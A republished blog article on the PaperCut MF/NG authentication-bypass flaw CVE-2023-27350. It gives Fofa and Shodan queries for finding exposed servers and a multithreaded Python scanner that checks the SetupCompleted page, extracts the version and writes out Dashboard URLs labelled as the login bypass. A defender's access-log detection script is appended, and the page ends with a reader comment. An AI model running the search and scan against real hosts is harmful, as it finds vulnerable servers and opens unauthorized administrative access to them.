
CVE-2023-27350: PaperCut MF/NG batch detection script


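Vulnerability description

This vulnerability allows remote attackers to bypass authentication on affected installations of PaperCut NG 22.0.5 (Build 63914). Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control. An attacker can leverage this vulnerability to bypass authentication and execute arbitrary code in the context of SYSTEM.

Search syntax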

# Fofa
title="papercut"

# Shodan
http.html:"papercut"

Batch detection

from queue import Queue
import re
from threading import Thread, Lock

from bs4 import BeautifulSoup
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Targets are often served with self-signed certificates, so certificate
# verification is disabled below and the resulting warning is silenced.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Page checked on every target
CHECK_PATH = "/app?service=page/SetupCompleted"
headers = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36'
}

# Serializes writes to the result file across worker threads
write_lock = Lock()


def write_Result(url):
    with write_lock:
        with open("result.txt", "a", encoding="utf-8") as f:
            f.write(url + "\n")


def ReadFile(fQueue: Queue):
    # text.txt = the text file to read, one base URL per line
    # Currently a static path for testing
    with open(r"text.txt", 'r', encoding='utf-8') as file:
        for line in file:
            target = line.strip().rstrip('/')
            if target:  # skip blank lines
                fQueue.put(target)


class A(Thread):
    def __init__(self, a):
        super().__init__()
        self.target = a  # base URL of one host to check

    def run(self) -> None:
        try:
            response = requests.get(url=self.target + CHECK_PATH, headers=headers,
                                    verify=False, timeout=10)
        except requests.RequestException:
            return  # unreachable host or TLS/connection error
        # print("URL:{} STATUS:{}".format(response.url, response.status_code))
        if response.status_code != 200:
            return
        soup = BeautifulSoup(response.text, 'html.parser')
        text_div = soup.find('div', class_='text')
        # The page shows the product version in a <span> inside <div class="text">
        spans = text_div.find_all('span') if text_div else []
        version_span = None
        for span in spans:
            version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
            if version_match:
                version_span = span
                break
        if version_span is None:
            print('Not Vulnerable')
            return
        version_str = version_span.text.strip()
        print('Version:', version_str)
        print('HTTP Status Code:', response.status_code)
        print(f"1) Visit this URL > {self.target}{CHECK_PATH}")
        # Record the host once, after the version string has been found
        write_Result(self.target + CHECK_PATH + '\n' + self.target + '/app?service=page/Dashboard')
        print(f"2) Login Authentication Bypass > {self.target}/app?service=page/Dashboard")


q = Queue()
ReadFile(q)
threads = []
while not q.empty():
    t = A(q.get())
    t.start()
    threads.append(t)
# Wait for every check to finish before the program exits
for t in threads:
    t.join()
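For defenders, the two requests the script prints (SetupCompleted, then Dashboard) can also be looked for in web access logs. The following is an added example, not part of the original article: it assumes a combined-format access log that records the query string, and the log lines, IP addresses and the function name `classify` are constructed for illustration.

```python
import re

# Constructed sample lines in combined log format (assumption: a web server
# or reverse proxy in front of PaperCut writes its access log in this format).
SAMPLE_LOG = """\
203.0.113.7 - - [21/Apr/2023:10:01:02 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120 "-" "python-requests/2.28"
203.0.113.7 - - [21/Apr/2023:10:01:05 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 20480 "-" "python-requests/2.28"
198.51.100.9 - - [21/Apr/2023:10:02:00 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.10 - - [21/Apr/2023:10:03:00 +0000] "GET /app?service=page/Dashboard HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.44 - - [21/Apr/2023:10:04:00 +0000] "GET /app?service=page/SetupCompleted HTTP/1.1" 403 312 "-" "curl/8.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
PAGE_RE = re.compile(r'[?&]service=page/(SetupCompleted|Dashboard)\b', re.I)


def classify(log_text):
    """Return {client_ip: severity} for clients that reached SetupCompleted.

    "probe"  : SetupCompleted was requested and answered with HTTP 200
    "bypass" : a later Dashboard request from the same IP also got HTTP 200
    """
    state = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["status"] != "200":
            continue  # unparsable line, or the request was refused
        page = PAGE_RE.search(m["path"])
        if not page:
            continue
        name = page.group(1).lower()
        if name == "setupcompleted":
            state.setdefault(m["ip"], "probe")
        elif name == "dashboard" and m["ip"] in state:
            state[m["ip"]] = "bypass"  # Dashboard right after SetupCompleted
    return state


if __name__ == "__main__":
    for ip, severity in classify(SAMPLE_LOG).items():
        print(f"{ip}\t{severity}")
```

A Dashboard request on its own (192.0.2.10 in the sample) is ordinary administrator traffic and is not flagged; only the SetupCompleted-then-Dashboard sequence from one client is escalated.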
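Copyright notice: this article is licensed under the Creative Commons Attribution 4.0 International License [BY-NC-SA]
Article title: "CVE-2023-27350: PaperCut MF/NG batch detection script"
Article link: https://www.wevul.com/606.html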

Comments (1)

  1. #1

    Thanks, this is exactly what I needed.

    AKA, 10 months ago (05-14)
